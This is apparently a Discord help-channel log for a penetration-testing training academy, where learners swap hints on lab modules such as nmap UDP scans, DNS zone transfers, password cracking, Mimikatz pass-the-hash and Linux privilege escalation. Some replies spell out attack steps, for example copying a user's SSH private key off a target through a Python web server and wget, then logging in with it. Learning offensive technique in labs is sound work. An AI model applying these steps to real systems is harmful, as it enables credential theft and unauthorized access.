# barren escarp Yes

This one is deceptive. It's a lot simpler than you think too. You're probably using -sS and -sV but think about what DNS runs on. It can run on two types of protocols. One which is connection oriented (TCP), and one other one. What's the other one?

barren escarp
#

UDO

#

-sU

#

UDP*

scenic plover
#

Give it a shot and see what happens. The only way you'll know

barren escarp
#

Its just stuck right now lol
└──╼ $sudo nmap -sU 10.129.2.48
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-30 19:59 EDT

scenic plover
#

You're so close man.

barren escarp
#

PORT STATE SERVICE VERSION
53/udp open domain NLnet Labs NSD

#

Thats what I get, NLnet Labs NSD but thats not the right answer

#

Heres the command I used - sudo nmap -sU -sV -p 53 10.129.216.96 --script dns-nsid.nse

scenic plover
barren escarp
#

I'll cut the script and try again

#

I cut the script, I didn't change much. I think cut the-sV and got the below. I cant cut much else lol
PORT STATE SERVICE
53/udp open domain

scenic plover
#

DM me

half shell
#

Can someone give me a hint for below question? This question is the harder than other module as I am not a native English speaker… Some question is hard to understand what is asking for… Submitting flag is much easierβ€¦πŸ˜­

M: DOCUMENTATION & REPORTING(Notetaking & Organization)
Q: What tool mentioned in this section can make logging a session easier?

small sage
#

I'm stuck on the Credential Hunting in Linux section of the Password Attacks module;
I've tried mutating the given password for Kira several different ways and have gotten nowhere, any hints?
edit: nevermind case sensitive username 😦

pine dagger
#

Go through the section, get the names of the tools they talk about, figure out which one has anything to do with sessions.

red current
#

Never mind. It's just really really slow. I got the flag.

vast vector
#

hello guys, anyone taking Pentester path and on getting started module? Need help on something please

half shell
pine dagger
#

That’s ||not the name of the tool. That’s a command to configure the tool. What is the tool called?||

mystic light
vast vector
mystic light
mystic light
vast vector
# mystic light what is the question you have

I can't seem to figure out what to do on it. I read the module several times to determine my next action but I'm struggling. Now, I'm not sure if I need to learn other modules first before I can answer it and maybe I'm not taking the modules in correct order.

half shell
vast vector
#

I was actually expecting that after reading the context I should be able to answer the challenges at the end. but It is not what I'm experiencing now. need advise.

mystic light
# vast vector I was actually expecting that after reading the context I should be able to answ...

ok, so you got access to user2 and have a shell yes? now you need to find a way to access the root user.
this is enumeration, pure and simple. start a checklist. everytime you make progress on anything: got a shell? enumerate. new box? enumerate.
in the module there are 10 things to look for that will help.
now that you have user2, start over. what can user2 access that user1 couldnt.
add each of those to the checklist.

vast vector
naive lodge
#

Maybe I found a bug in a room

#

Any administrator can contact me for moore infos

rugged veldt
#

Hey is there anyone I can msg about my payload I'm using for Advanced Command Obfuscation?

valid forge
#

Currently banging my head against a wall over Zone Transfers in the Information Gathering - Web Edition module... Any help with this would be greatly appreciated.

torn cedar
#

why is my kernal version not in the format they ask for?

glacial hazel
torn cedar
acoustic owl
glacial hazel
torn cedar
glacial hazel
#

seems like the same format to me πŸ˜›

#

digit.digit.digit

torn cedar
glacial hazel
#

rip idk

valid forge
torn cedar
acoustic owl
valid forge
acoustic owl
#

This is not directly visible on this output

#

I'm assuming you're coming up with two zones based on the SOA entry, right?

balmy saffron
#

hello, I am at the first step password attacks/network service. I am supposed to "Find the user for the WinRM service and crack their password."
I tried using crackmapexec with the password list xato....1000.txt and the top-usernames-shortlist.txt in Seclists...
Are there better lists I didn't find?

valid forge
valid forge
#

I'm remembering now that each can only have a single SOA, so that would make sense for those 2 to be it

acoustic owl
#

My assumption comes from the fact that many students make this mistake.
By the way, the blue marked is a mail address πŸ˜‰

valid forge
#

The main reason I haven't touched the one marked in blue is because it was found to be a mail address

#

I'll test that out

valid forge
vast vector
#

hello how can I copy the id_rsa from a user to the attack machine?

glacial hazel
#

but why do you want to do that is the question

vast vector
glacial hazel
#

do you have rce on the target?

vast vector
#

sorry I'm totally new, what is RCE? I mean I'm able to get in to the remote machine and just trying to escalate privilege from user2 to root

glacial hazel
#

what user is the id_rsa for?

#

user2?

vast vector
#

yes user2

fathom pendant
#

So the module should have talked about how to transfer files

#

One of them being python -m http.server <port> which starts a webserver on that port

#

Run that on the target machine in the directory where the id_rsa is.

vast vector
fathom pendant
#

In another terminal window you can use wget http://IP:port/id_rsa

fathom pendant
#

It most likely did in a different section

#

But you might not have taken notes on it

vast vector
#

this is just getting started module though

fathom pendant
#

Sections are not the same as modules. I'm not at my computer to double check for you but I'm fairly certain it talks about transferring files

#

Each module has several sections in it

#

You might use information from a previous section in the module at a later point

fathom pendant
#

There is a whole module as well regarding file transfers

fathom pendant
vast vector
#

i dont know how I should proceed after lol

fathom pendant
#

You also need to make sure the rsa permissions are correct (iirc chmod 700)

#

Again the module itself talks about RSA permissions

#

I'd definitely reread everything and take notes

#

It's not a bad thing to take notes

glacial hazel
vast vector
#

well to be fair, I'm taking notes. It's just that I'm not seeing the things I'm expecting to see hehe

fathom pendant
#

It's bad to just copy/paste instead of rewriting info in your own words (aside from commands)

vast vector
#

say for example this one

fathom pendant
#

Yes

#

So

vast vector
#

right after I enter vim id_rsa

#

it will direct me to the editor (i think it's expected)

fathom pendant
#

YES

vast vector
#

but where should I put the chmod after?

fathom pendant
#

Ctrl+shift+v to paste into text editor

vast vector
#

on that visualization it looks like you can do it step by step

fathom pendant
#

Yes

vast vector
#

you know what i mean?

fathom pendant
#

After entering into the text editor and saving

#

:wq

#

For vim

#

And ssh syntax is ssh <user>@<IP> -i id_rsa

#

Also

vast vector
fathom pendant
#

It's something that you can learn and Google

#

There are a good chunk of examples where the module gives you 90% of the info to learn and 10% requiring extra research

vast vector
fathom pendant
#

Learning how to research and look things up is a useful skill

#

The reason a writeup might omit something is if they believe it to be common knowledge

#

Also for modules that are t1+ you won't (or shouldn't) find any writeups

#

As writeups for any non-fundamental (tier-0) content is strictly prohibited

#

But I will say: info on how to complete modules is almost always within the module

fathom pendant
vast vector
#

just need to be patient

fathom pendant
#

Learning and taking good notes is a skill. Some people it's easier than others

#

It's just in how you naturally process information. Alongside that writing things down to help you reinforce it

#

Also you should be able to piece together known information with unknown info to ask better questions to google

#

Using <tool> to do <job>

#

Because a LOT of tools are REALLY well documented

vast vector
#

so I figured it out lol

vast vector
fathom pendant
#

Eh it's because it's more meant to be "this is the 'hardest' way if you have no other options"

vast vector
#

I figured it was not because of "transferring file", I was not using the correct user after gaining the rsa. I'm still using user2 and trying to go to root from it, instead of using root directly to ssh lol

#

that's fun

#

got the Flag! wheeeew

fathom pendant
#

Gz

tawny orbit
#

Hey all, I'm doing the third question of the Information Gathering - Web - Skills assessment where the question is: Perform active infrastructure identification against the host https://i.imgur.com. What server name is returned for the host? | I get a status code of 302 indicating that the URL has temporarily been moved to another location. What do I do now?

#

its all good I just curled the original URL hoping that they would be hosted on the same server and it worked

timid pollen
#

hi guys i am having trouble with this:

Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

rustic sage
#

Hello. I'm stuck on the first step of the Windows Privilege Escalation Skills Assessment - Part I. I don't know which user to connect to the target as. I do an nmap and see open RDP port 3389. Even with the --script rdp-ntlm-info and rdp-enum-encryption I get more information, but I can't find which user to use to connect to xfreerdp. Can someone help me please?

odd notch
#

Hi I'm stuck at the last section of the footprinting module in DNS section.

#

I don't understand how to find the answer

shadow canopy
#

what commands you tried

shut portal
#

Hello. I need help for the skill assessment on Hacking WordPress. For the first question, I tried to enumerate with WPScan but it end up saying that the target doesn't appear to be running WordPress.

odd notch
#

got some results but non end in 203

#

tried listinbrute forcing same issue

shadow canopy
#

So after zone transfer you can do another axfr on the found subdomains.

#

and add them to /etc/hosts

odd notch
#

and don't I need to have the IP to add them ot the hosts?

shadow canopy
#

nameserver IP same

odd notch
#

Oh ok... I still don't see how it leads me to the answer tho

shadow canopy
#

after you identify all subdomains with dig and add them to /etc/hosts, you can brute force them

odd notch
#

can't you do that either way?

shadow canopy
#

I don't think you can brute force if not in hosts file

acoustic owl
#

The computer file hosts is an operating system file that maps hostnames to IP addresses. It is a plain text file. Originally a file named HOSTS.TXT was manually maintained and made available via file sharing by Stanford Research Institute for the ARPANET membership, containing the hostnames and address of hosts as contributed for inclusion by me...

#

In this task you will have a DNS server that will resolve the domains

shadow canopy
#

oh ok my bad.
Then only the case if they are vhosts are needed in hosts file

acoustic owl
#

No, not necessarily

glacial hazel
#

Does the module have you use a certain name server?

#

that contains the .htb TLD

acoustic owl
#

You only need the hosts file if

A) no DNS server is available for the resolution.
B) you want to manipulate the result from the DNS server.

shadow canopy
#

yeah makes sense

acoustic owl
glacial hazel
odd notch
#

Ok so... I still can't find the answer... this is getting a bit funny

acoustic owl
#

I do not want to spoil the complete task here

cursive swallow
#

Hey, I'm trying to complete the last section, Knowledge Check of the Getting Started module. I need a little hint. I got the admin creds, logged into the admin panel and found the right exploit. Minor spoiler ahead; ||the upload file button that I need to use for the exploit uses Adobe Flash Player, which is as we all know deprecated.|| Is there any way around this, or is this box broken? How would I approach that?

#

I guess there is an alternative path using metasploit, but is there a way to complete it using the path I described above?

rustic sage
#

Hi all, I am trying to find that admin password in the footprinting module, imap section. I am logged into the server and none of the commands work for me, I keep getting unknown command unless I put 'tag' in front of them. I can see the list of directories but I am not sure how to interact with them since all I am getting is error messages like "tag BAD Error in IMAP command FETCH: Invalid arguments (0.001 + 0.000 secs)."

untold lily
#

hi, i'm stuck at question 2 of the password token module. i' decoded the token and replaced the htbuser with htbadmin then hexed and base64'd it. when i use that token to sign in as htbadmin it doesnt work. what am i doing wrong?

rustic sage
#

Hi guys, am I the only one who is experiencing problems when accessing the boxes at the end of the module?
Example:
I start the htb virtual machine and also start the target, but when I then run the (correct) commands they don't work.
Can anyone tell me why? Maybe I should be subscribed?

brave sail
#

where is python3 located in the pwnbox?

fiery berry
brave sail
#

thanks a lot! Found it with the commans

#

command*

fathom pendant
#

Please provide more context: what command are you running and what errors are you getting @rustic sage

barren kite
#

Has anyone used the CRT pathway and taken the CRT recently?

half shell
#

I tried to enumerate page(gobusteer) & param(FFUF), I found couple of plugins. I submitted the answer(e.g. contact-form-7), but not correct.... May I know the hint how can I find correct plugin? I tried viewing source code, fuzz dir, param, reading readme.txt...

M:WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

broken warren
#

in the module introduction to network traffic analysis, on the tcpdump fundamental section, Question 2. " Were absolute or relative sequence numbers used during the capture?"Is that NOT a yes or no question? i mean even the hint asks a yes or no question, but neither yes, no, maybe, absolute sequence, or relative sequence work. Im much confused

pine dagger
#

Does anyone know why my dashboard shows 70% complete in general, but I've completed every General module?

acoustic owl
#

Currently I have still one General and one Defensive module pending

pine dagger
# acoustic owl No idea how this figure is calculated

All General finished. 2 Defensives outstanding.
General modules: Learning Process, Intro to Academy, Linux Fundamentals, Introduction to Bash Scripting, DNS Enumeration Using Python, Introduction to Networking, Web Requests, Windows Fundamentals, Introduction to Active Directory, Introduction to Web Applications, Intro to Network Traffic Analysis, Intro to Assembly Language, Setting Up, Introduction to Python 3, Testing Process, MacOS Fundamentals, Bug Bounty Hunting Process, Documentation and Reporting, Introduction to Windows Command Line.

river skiff
#

@acoustic owl maybe there are more modules to be released until 100% are reached.

acoustic owl
acoustic owl
pine dagger
#

But new modules are always coming... 😦

acoustic owl
pine dagger
#

I know. If someone told me about that back at school.... may never have gone into computers >.<

#

Now its too late. Far too late.

pine dagger
fathom pendant
#

^

#

it's asking A or B

#

were Absolute(A) or Relative(B) sequence numbers used

#

because it will always capture A and B, but specifically which ones were used is the actual question

pine dagger
#

If you're struggling to answer that question on whether its absolute or relative, I'd suggest going back and re-reading the material. πŸ™‚

fathom pendant
#

it's more of a comprehension question than a material question

#

like if yes/no isn't the answer then make sure you understand what you're being asked

broken warren
fathom pendant
#

re-read the material then and figure out what you're missing or the crucial part to help you answer the question

broken warren
#

Thanks everyone for helping

woven badger
#

I'm struggling some with the final assessment within the File Upload Attacks.
I can get files past the filter, read the source code for the PHP files, etc.

The issue I'm seeing is that if it's base64 encoded then it can't execute it as PHP and if svg it appears you can read files but can't do PHP code. Is there something I am missing here?

fathom pendant
timid pollen
#

hi guys i am having trouble with this:
windows priv escalation:
Using the techniques in this section obtain the cleartext credentials for the SCCM_SVC user.

basically i am putting the malicious file in the shared folder in c:\ but sccm_scv user wont access the folder so i am stck

any ideas>??

broken warren
fathom pendant
pine dagger
#

I go with the approach, that if the question gives specific prompts for what the answers should be, then you should make them match how they've stated them.

broken warren
fathom pendant
fathom pendant
#

<@&861185840277487616>

left sapphire
#

i'm having an issue on the module for "Login Brute Forcing" on the "Skill assessment - Website" where it is super slow to brute force where it is estimating to take 36 hours which im sure is not the point of the module

#

not sure if its just my wordlists or what

novel matrix
fathom pendant
left sapphire
#

this is all that it gave me

#

this is the cheat sheet for the wordlists

winged hedge
#

Thanks @fathom pendant. You are very appreciated!

acoustic owl
winged hedge
half shell
#

Sorry for asking again...
I used aggressive plugin scan... but I can not find any correct answer... Is it possible to solve this question?

M:Attacking Common Applications: WordPress - Discovery & Enumeration
Q:Perform manual enumeration to discover another installed plugin. Submit the plugin name as the answer (3 words).

autumn pilot
#

go through the pages

#

gobuster won't help you much as it is not needed

left sapphire
autumn pilot
#

for sure it is not 36 hours to get to the credentials

#

use the wordlists from the cheatsheet

left sapphire
#

i mean theres 3 but i tried all of them

#

they are all pretty long idk

autumn pilot
#

take a look at your command

fathom pendant
#

estimated time does not always equate to exact time either :)

autumn pilot
#

you can even try using wireshark to see if everything is ok

fathom pendant
#

if username and password are high up on the list you'll get it well before the 36 hours

left sapphire
#

okay ill let it run for a while then

fathom pendant
#

what's the full command you're running (not sure if the screenshot is cutoff or it's wrapped text

fathom pendant
#

nvm

#

i misread

naive field
#

hey im on password attacks module section passwd shadow and opasswd and they only showed how u open files and read em and crack

#

but i dont have any perms on will account to read them lol

#

what am i supposed to do

autumn pilot
#

enumerate πŸ˜‰

fathom pendant
left sapphire
#

it shows the ful lthing

#

still goin

naive field
autumn pilot
#

let him enumerate marcilee

fathom pendant
naive field
fathom pendant
#

however it doesn't hurt to look

naive field
#

thanks

#

i didnt think i had to enumerate lol

fathom pendant
#

rule #1 always enumerate

#

enumerate -> determine if need to escalate -> find escalate path -> repeat

naive field
#

so ik if i did it good or it just takes this long xd

fathom pendant
#

considering the full /etc/passwd file is there you might need to go in and edit any non-user accounts out of the unshadowed file

naive field
#

oh okay

#

gotchya

#

so just leave root?

fathom pendant
#

up to you but this module does a fair bit of reuse of previously gained credentials

naive field
#

okay then ill leave it

fathom pendant
#

but there are a handful of non-user accounts in there that aren't really useful :)

naive field
#

it says time left 5hours, i hope its not accurate

#

πŸ‘€

fathom pendant
#

usually not if you're using the mutated list from the provided resources

naive field
#

im using rockyou.txt

#

ethats what they used in the module

#

so i thought that should be it

fathom pendant
#

not everything is gonna be 1:1

#

from what I remember pass attacks after it tells you how to make the mut_password.list uses that list

naive field
#

yeah

calm robin
#

hello. mb someone can help me. i cant open target(ip in questions), browser shows white screen and 404 error in devtools, updating target cant help. at morning all was good

acoustic owl
#

Try it also once from the PwnBox

calm robin
#

tryed, the same

river token
#

Password Attacks >>> Network Services >>> Any clues as to what user list and password list I should be using? Apparently the resource list provided with the module will not get me there 😦

river token
sleek urchin
#

just read it again and try to replicate it

river token
#

The reading section used the user and password list from the module resources and didnt seem to cut it. I'll go back and try again

#

That is just crazy

#

copy and past the same commands twice

#

two diff results

#

thanks for your time!

sleek urchin
#

doing AD: DCSync , I tried ssh into 172.16.5.225 with the right creds. and it gives wrong password, and mimikatz doesn't seem to be working as wanted

#

any help ?

sleek urchin
naive field
#

hey im on password attack pass the hash section and the question is "Connect via RDP and use Mimikatz located in c:\tools to extract the hashes presented in the current session. What is the NTLM/RC4 hash of David's account? "

#

they didnt mention dumping the hashes in this section?

fathom pendant
#

not JUST the IP

fathom pendant
heady tusk
naive field
#

it says that "sekurlsa::pth" module doesnt exist

fathom pendant
#

huh weird

#

i didn't have any issues

steady hawk
#

Try privilege::debug first

naive field
#

i did

steady hawk
#

hmm

devout osprey
#

could you help me with this question? "What is the 2021 OWASP Top 10 classification for this vulnerability?"

fathom pendant
devout osprey
#

i tried

#

to put in the field all of these

#

but it didnt work

fathom pendant
#

Think about the type of attack it is and match it with that classification

winged hedge
#

so maybe that's the issue?

fathom pendant
#

you're talking about everything after the pth part yeah?

winged hedge
#

first character is "

fathom pendant
#

yes and it ends with a " it looks like the right half of the terminal was not included in the screenshot but screenwrap shows an ending "

#

at least that's what it appears to me

devout osprey
winged hedge
#

yup, same here

devout osprey
#

and it ends with 'n'

fathom pendant
#

Look how they're classified A##:2021-<Classification>

devout osprey
#

yes so that would be A10:2021

#

but it doesn't fit

fathom pendant
#

how is it A10? is it server-side request?

devout osprey
#

yeah

fathom pendant
#

are you SURE

devout osprey
#

i think so

fathom pendant
#

What do you do to perform the exploit

devout osprey
#

injection i guess

#

idk

fathom pendant
#

Just take a minute to walk yourself through the attack

devout osprey
#

ah i dont quite understand it

fathom pendant
#

I'm trying to basically tell you: you shouldn't guess, you should be sure

devout osprey
#

yeah I get your point, but I'm not sure, maybe I should get back to the previous lessons

naive field
#

idk whats the problem.....

winged hedge
naive field
#

put it between quotes

winged hedge
#

try without please

naive field
#

but i still dont get it how to exract the hashes with mimikatz?

#

cuz i didnt see it anywhere being in the module

winged hedge
naive field
winged hedge
naive field
#

now tis is f-ing me up i cant import

#

it

fathom pendant
#

Is it psd1 or ps1

naive field
#

it says psd1

#

in the module

fathom pendant
#

So if you dir

#

It also shows psd1

naive field
#

dir where?

fathom pendant
#

Just making sure

#

Oh

#

I see your issue

#

You're not in the C:\tools directory

acoustic owl
fathom pendant
#

Iirc that's where they're located at

naive field
#

oh shi im dumb

#

thanks again...

pine dagger
# naive field dir where?

You understand that when you are specifying .\ in that format, it means call the local directory location, right? So you need to be in the directory with the file to use the command in that format.

rustic sage
#

I am currently having issues with odat.py in the footprinting module. When I try to use odat.py, I get the following error: "root㉿kali)-[~/odat]
└─# ./odat.py -h
Traceback (most recent call last):
File "./odat.py", line 5, in <module>
from libnmap.parser import NmapParser
ImportError: No module named libnmap.parser"

fathom pendant
#

Did you compile it as shown from the module?

rustic sage
#

I messed up one part and though it was just a mistake and now I can go back and run the proper commands, but it may have screwed stuff up

#

is there a way to revert all changes I just made?

fathom pendant
#

Β―_(ツ)_/Β―

pine dagger
#

If you're using the HTB box, just reset everything πŸ™‚

rustic sage
#

I am on my own VM...

fathom pendant
#

You might be able to cd ~; rm -rf ~/odat/

#

And rerun the setup script

rustic sage
#

Looks like I may be learning my lesson to use the snapshot feature of VMware when I download new things... FeelsBadMan

scenic plover
rustic arrow
#

hey all, im trying to run mount -t nfs <ip>:/ /mnt/nfs -o nolock but I get the following error mount.nfs: Operation not permitted
I am running as root, anyone has any idea what it could be?

fathom pendant
#

Don't run as root, run with sudo

#

You should almost never be running things as root

rustic arrow
#

@fathom pendant im inside a container, also I tried it using sudo as a normal user

fathom pendant
#

Β―_(ツ)_/Β―

fathom pendant
#

Are you sure you need to add the :/ after the IP?

rustic arrow
fathom pendant
#

It could be mount -t nfs ip:/<share filename>

rustic arrow
fathom pendant
#

Ah that's why

#

The example even tells you

rustic arrow
#

mount.nfs: remote share not in 'host:dir' format

fathom pendant
#

Also just say the module name

#

I'm not home to sanity check

rustic arrow
fathom pendant
#

Are you able to create a different directory and try mounting it to that?

scenic plover
#

You need to showmount -e (IP) then attempt to mount one of those shares. You're attempting to mount the root directory. lol

fathom pendant
#

I don't recall having many issues

fathom pendant
#

I do have notes at home on my syntax but I'm at work. I'll be home in like 8-9 hrs

scenic plover
rustic sage
#

I was running my kali as root since I did the TCM course, should I stop doing that??

fathom pendant
#

Yes

#

You should almost never be root

#

Sudo does everything you need to

thorn urchin
#

eh if its a kali vm its kinda whatever

#

but more and more stuff whines about being ran as root when its not needed

fathom pendant
#

^

rustic arrow
#

Im running a kali container, cant find a good solution for running VMs in apple silicon

fathom pendant
#

Qemu I heard is good

rustic arrow
#

yes, UTM uses qemu but it was quite slow, not sure if it was a utm or qemu issue

fathom pendant
#

Worst case scenario just use pwnbox lol

rustic arrow
mystic light
rustic arrow
#

btw, my issue got solved when I used parrot, thanks

mystic light
fathom pendant
#

VMware does have a free version

rustic arrow
#

time to convince my work I need a license

mystic light
fathom pendant
#

Not sure how good it is

rustic arrow
fathom pendant
rustic arrow
#

I used the free one for windows and linux, it's great

fathom pendant
#

Idk the differences

mystic light
rustic arrow
fathom pendant
#

I've heard decent things about parallels

mystic light
fathom pendant
#

^ Apple itself is just frustrating to work around

rustic arrow
mystic light
fathom pendant
#

Apple + any non-apple product is iffy

fathom pendant
mystic light
fathom pendant
#

Straying off-topic here

#

But in general if you are using virtualization on M1 architecture you generally need to be using the Architect editions of Linux OS

paper rivet
#

Could you help me please with the module of firewall in nmap? I can't resolve the medium lab. I tried to use decoy with nmap but that does not work

rustic sage
#

So I reinstalled kali an downloaded everything again, followed the step in the module EXACTLY, and I was still getting the same error in the footprint module with odat. So now I am reinstalling and setting things up to that point and taking a snapshot. I will finish this module and then play around with installing odat again because this has been frustrating... and I see that people have been having this issue since the module update recently. Any advice???

mystic light
rustic sage
#

When I do that, everything works, except for the file upload at the end of the module. So for now I will set it up to that point and leave it be I guess. Take a snapshot and move on then try again tomorrow morning.

woeful ermine
halcyon pond
#

For AD enum and Attacks Skill assesment 2 Q4 I know i have to password spray using Jsmith to make a userlist and W*****1 but it still wont go through

crystal pulsar
#

Who can help me at skill assesment 2 AD, because i don't know how to pass :))

I need to find CT**** hash, but i run responder on both machine MS01 and SQL using Administartor account and mssqlsvc user, cannot find the hash 😦

thorn urchin
crystal pulsar
thorn urchin
#

Neat, I dont recall that mentioned in the module anywhere

#

try a different tool

crystal pulsar
#

What tool ?

#

I stay 2 days

#

At this question :))

thorn urchin
#

Review the section notes

#

it mentions a similar tool specifically to be ran from windows

crystal pulsar
#

Ooo, yeah i forgot abaout it :))

thorn urchin
#

also patience as well

#

easy to give up too early

#

and then just think its not working when it really is

cunning prairie
#

Try CME with X flag and play around using another user's low privilege credentials.

balmy saffron
#

hello, I am at the first step password attacks/network service. I am supposed to "Find the user for the WinRM service and crack their password."
I tried using crackmapexec with the password list xato....1000.txt and the top-usernames-shortlist.txt in Seclists...
Are there better lists I didn't find?

fathom pendant
balmy saffron
#

thank you, I never noticed this resource section....................

fathom pendant
#

The custom.rule is also what will be used to mutate the password.list from that section

balmy saffron
#

great thank you again

fathom pendant
balmy saffron
#

πŸ‘

grand badge
#

say why does the nmap is slow at times? i am trying to do a scanning with kali linux for a school assignment ....please and thanks all πŸ™‚

grand badge
thorn urchin
#

Then it doesnt belong here

grand badge
#

right now as we speak i am doing python network programming for network defense

thorn urchin
#

this channel is for module discussion only

grand badge
#

oh k i will do that and thanks madfox πŸ™‚